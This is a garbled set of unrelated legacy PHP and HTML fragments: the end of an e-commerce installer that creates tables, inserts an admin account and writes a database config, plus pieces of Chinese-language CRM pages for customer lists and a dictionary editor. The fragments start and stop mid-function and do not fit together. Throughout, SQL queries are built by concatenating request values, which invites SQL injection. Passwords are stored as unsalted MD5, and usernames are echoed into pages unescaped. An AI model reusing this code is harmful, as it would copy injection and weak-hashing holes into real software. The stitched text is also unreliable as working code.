show_process(r(Lang::get('selecte_db'), false), 'parent.show_warning("' . Lang::get('selecte_db_error') . '");');
return false;
}
/* 建立数据库结构 */
show_process(r(Lang::get('start_setup_db'), true));
$sqls = get_sql(version_data('structure.sql'));
foreach ($sqls as $sql) {
$sql = replace_prefix('ecm_', $db_prefix, $sql);
if (substr($sql, 0, 12) == 'CREATE TABLE') {
$name = preg_replace("/CREATE TABLE `{$db_prefix}([a-z0-9_]+)` .*/is", "\\1", $sql);
mysql_query(create_table($sql));
show_process(r(sprintf(Lang::get('create_table'), $name), true, 1));
} else {
mysql_query($sql, $con);
}
}
/* 安装初始数据 TODO 暂时不完整 */
$sqls = get_sql(version_data('initdata.sql'));
$password = md5($admin_pass);
$sqls[] = "INSERT INTO `ecm_member`(user_name, email, password, reg_time) VALUES('{$admin_name}', '{$admin_email}', '{$password}', " . gmtime() . ")";
foreach ($sqls as $sql) {
$rzt = mysql_query(replace_prefix('ecm_', $db_prefix, $sql), $con);
if (!$rzt) {
show_process(r(Lang::get('install_initdata'), false), 'parent.show_warning("' . mysql_error() . '");');
return false;
}
}
if (mysql_errno()) {
echo mysql_error();
}
show_process(r(Lang::get('install_initdata'), true));
/* 安装初始配置 */
$db_config = "mysql://{$db_user}:{$db_pass}@{$db_host}:{$db_port}/{$db_name}";
$ecm_key = get_ecm_key();
$mall_site_id = product_id();
save_config_file(array('SITE_URL' => $site_url, 'DB_CONFIG' => $db_config, 'DB_PREFIX' => $db_prefix, 'LANG' => LANG, 'COOKIE_DOMAIN' => '', 'COOKIE_PATH' => '/', 'ECM_KEY' => $ecm_key, 'MALL_SITE_ID' => $mall_site_id, 'ENABLED_GZIP' => 0, 'DEBUG_MODE' => 0, 'CACHE_SERVER' => 'default', 'MEMBER_TYPE' => 'default', 'ENABLED_SUBDOMAIN' => 0, 'SUBDOMAIN_SUFFIX' => ''));
/* 写入系统信息 */
save_system_info(array('version' => VERSION, 'release' => RELEASE));
show_process(r(Lang::get('setup_config'), true));
/* 锁定安装程序 */
touch(LOCK_FILE);
show_process(r(Lang::get('lock_install'), true));
if (is_file(ROOT_PATH . '/integrate/index.php')) {
/* 跳至整合程序 */
show_process(r(Lang::get('install_done'), true), 'parent.goon_install("' . $site_url . '/integrate/index.php", "' . $_code . '");');
} else {
/* 安装完成 */
show_process(r(Lang::get('install_done'), true), 'parent.install_successed();');
return false;
}
}
<title>无标题文档</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="http://code.jquery.com/mobile/1.2.0/jquery.mobile-1.2.0.min.css" />
<script src="http://code.jquery.com/jquery-1.8.2.min.js"></script>
<script src="http://code.jquery.com/mobile/1.2.0/jquery.mobile-1.2.0.min.js"></script>
<body>
<div data-role="page" id="page1">
<div data-role="header">
<a href="./mcustomer_list.php">返回</a><h1>客户详细页面</h1>
</div>
<div data-role="content">
<?php
$page = $_GET['page'] ? $_GET['page'] : 1;
$page_size = 20;
$sqlstr = get_sql("select * from {pre}services where 1=1 and fid=" . $id . " order by dateline desc");
$s_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size);
$total_nums = $db->getRowsNum($sqlstr);
?>
<?php
$i = 0;
foreach ($s_list as $lists) {
$i = $i + 1;
$remindTime = $lists['remindTime'];
$dateline = $lists['dateline'];
?>
<div class="ui-block-a" style="width:120px" ><?php
echo $i;
?>
?>
<tr>
<td height="24" colspan="9" bgcolor="#F8FCF6"><?php
page($sqlstr, $page_size, "customer_list.php?industry=" . getvar(industry) . "&managerid=" . $managerid . "&queryname=" . $queryname . "&page", $page);
?>
</td>
</tr>
</table>
<div class="h2 text-center">下属客户情况</a>
<table class="table table-hover table-bordered">
<thead>
<tr bgcolor="#f5f5f5" class="text-center"><td>姓名</td><td>客户数量</td></tr>
</thead>
<?php
$sqlstr = get_sql("select id,username,usermenu from {pre}manager where pid=" . $userId . " order by id desc");
$s_list = $db->getlist($sqlstr);
$tabStr = "";
foreach ($s_list as $vo) {
?>
<tr><td>
<a href="./customer_list.php?industry=<?php
echo $industry;
?>
&username=<?php
echo $vo['username'];
?>
">
<?php
echo $vo['usermenu'];
?>
$sqlstr = $sqlstr . " and name='" . getvar("name") . "'";
}
}
if (getvar("act") == "submit") {
$record = array('type' => getvar("type"), 'code' => getvar("code"), 'name' => getvar("name"), 'sort' => getvar("sort"), 'remark' => getvar("remark"));
if ($id > 0) {
$db->update($GLOBALS[databasePrefix] . 'dic', $record, 'id=' . $id);
} else {
$id = $db->insert($GLOBALS[databasePrefix] . 'dic', $record);
}
echo "<script>alert('保存成功!');window.location='customer_dic.php';</script>";
}
if (getvar("act") == "mod") {
$vo = $db->getOneRow(get_sql("select * from {pre}dic where id = " . $id));
}
$sqlstr = get_sql($sqlstr . " order by id asc");
$area_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size);
$total_nums = $db->getRowsNum($sqlstr);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>无标题文档</title>
<link href="../css/admin_css.css" rel="stylesheet" type="text/css" />
<link href="../js/boxy.css" rel="stylesheet" type="text/css" />
</head>
<script>
function checkreg()
{
if (document.myform.name.value=="") {